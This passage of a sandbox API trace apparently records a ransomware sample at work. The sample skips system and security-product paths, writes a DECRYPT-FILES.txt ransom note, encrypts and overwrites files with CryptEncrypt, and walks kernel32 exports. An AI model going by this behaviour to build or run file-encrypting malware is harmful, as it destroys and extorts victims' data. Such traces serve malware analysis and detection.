lpString1="DZBKZBIC", lpString2="\\" | out: lpString1="DZBKZBIC\\") returned="DZBKZBIC\\" [0077.878] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="DZBKZBIC\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\" [0077.878] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\Program Files") returned 0x0 [0077.878] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch=":\\Windows") returned 0x0 [0077.878] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\Games\\") returned 0x0 [0077.878] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.878] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.878] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.878] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.878] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.878] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\All Users") returned 0x0 [0077.878] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.878] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.878] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.878] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="AhnLab") returned 0x0 [0077.878] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.878] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\") returned 96 [0077.878] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.878] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\\\jkbimi8.tmp") returned 108 [0077.878] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\dzbkzbic\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x460 [0077.879] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\") returned 96 [0077.879] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.879] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\\\DECRYPT-FILES.txt") returned 114 [0077.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\dzbkzbic\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0077.879] WriteFile (in: hFile=0x464, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0077.880] CloseHandle (hObject=0x464) returned 1 [0077.880] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\") returned 96 [0077.880] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\*" [0077.880] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaa9d9a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9d9a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d98 [0077.880] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.880] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaa9d9a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9d9a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.880] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.880] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.881] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9d9a60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9d9a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9d9a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.881] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.881] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9d9a60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9d9a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9d9a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.881] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.881] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.881] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.881] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.881] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.881] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.881] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.881] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.881] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.881] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.881] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.881] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.881] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.881] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.881] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.881] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\") returned 96 [0077.881] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.881] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\" [0077.881] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\jkbimi8.tmp" [0077.881] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.881] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\dzbkzbic\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.881] CloseHandle (hObject=0x0) returned 0 [0077.882] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.882] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9d9a60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9d9a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9d9a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.882] FindClose (in: hFindFile=0x5f8d98 | out: hFindFile=0x5f8d98) returned 1 [0077.882] CloseHandle (hObject=0x460) returned 1 [0077.882] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbaf619f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0077.882] lstrcmpiW (lpString1="index.dat", lpString2="DECRYPT-FILES.txt") returned 1 [0077.882] lstrcmpiW (lpString1="index.dat", lpString2="autorun.inf") returned 1 [0077.882] lstrcmpiW (lpString1="index.dat", lpString2="boot.ini") returned 1 [0077.882] lstrcmpiW (lpString1="index.dat", lpString2="desktop.ini") returned 1 [0077.882] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat") returned -1 [0077.882] lstrcmpiW (lpString1="index.dat", lpString2="iconcache.db") returned 1 [0077.882] lstrcmpiW (lpString1="index.dat", lpString2="bootsect.bak") returned 1 [0077.882] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat.log") returned -1 [0077.882] lstrcmpiW (lpString1="index.dat", lpString2="thumbs.db") returned -1 [0077.882] lstrcmpiW (lpString1="index.dat", lpString2="Bootfont.bin") returned 1 [0077.882] lstrlenW (lpString="index.dat") returned 9 [0077.882] lstrcmpiW (lpString1="dat", lpString2="lnk") returned -1 [0077.882] lstrcmpiW (lpString1="dat", lpString2="exe") returned -1 [0077.882] lstrcmpiW (lpString1="dat", lpString2="sys") returned -1 [0077.882] lstrcmpiW (lpString1="dat", lpString2="dll") returned -1 [0077.882] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned 87 [0077.883] lstrlenW (lpString="index.dat") returned 9 [0077.883] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\" [0077.883] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="index.dat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat" [0077.883] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.883] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0077.883] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=32768) returned 1 [0077.883] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0077.883] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0077.885] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0077.885] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0077.885] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.886] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0077.886] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0077.887] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.887] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0077.888] CloseHandle (hObject=0x464) returned 1 [0077.888] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.888] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0077.889] CloseHandle (hObject=0x0) returned 0 [0077.889] CloseHandle (hObject=0x460) returned 1 [0077.890] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.890] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.890] GetTickCount () returned 0x114bf98 [0077.890] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.890] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0077.891] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.891] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.891] lstrlenA (lpString="kernel32.dll") returned 12 [0077.891] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0077.891] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0077.891] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0077.891] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0077.891] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0077.891] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0077.891] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0077.891] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0077.891] lstrlenA (lpString="ADDATOMA") returned 8 [0077.891] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0077.891] lstrlenA (lpString="ADDATOMW") returned 8 [0077.891] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0077.891] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0077.891] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0077.892] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0077.892] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0077.892] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0077.892] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0077.892] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0077.892] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0077.892] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0077.892] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0077.892] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0077.892] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0077.892] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0077.892] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0077.892] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0077.892] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0077.892] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0077.892] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0077.892] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0077.892] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0077.892] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0077.892] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0077.892] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0077.892] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0077.892] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0077.892] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0077.892] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0077.892] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0077.892] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0077.892] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0077.892] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0077.892] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0077.892] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0077.892] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0077.892] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0077.892] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0077.892] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0077.893] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0077.893] lstrlenA (lpString="BACKUPREAD") returned 10 [0077.893] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0077.893] lstrlenA (lpString="BACKUPSEEK") returned 10 [0077.893] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0077.893] lstrlenA (lpString="BACKUPWRITE") returned 11 [0077.893] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0077.893] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0077.893] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0077.893] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0077.893] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0077.893] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0077.893] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0077.893] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0077.893] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0077.893] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0077.893] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0077.893] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0077.893] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0077.893] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0077.893] lstrcpyA (in: lpString1=0x3f2c7fc, 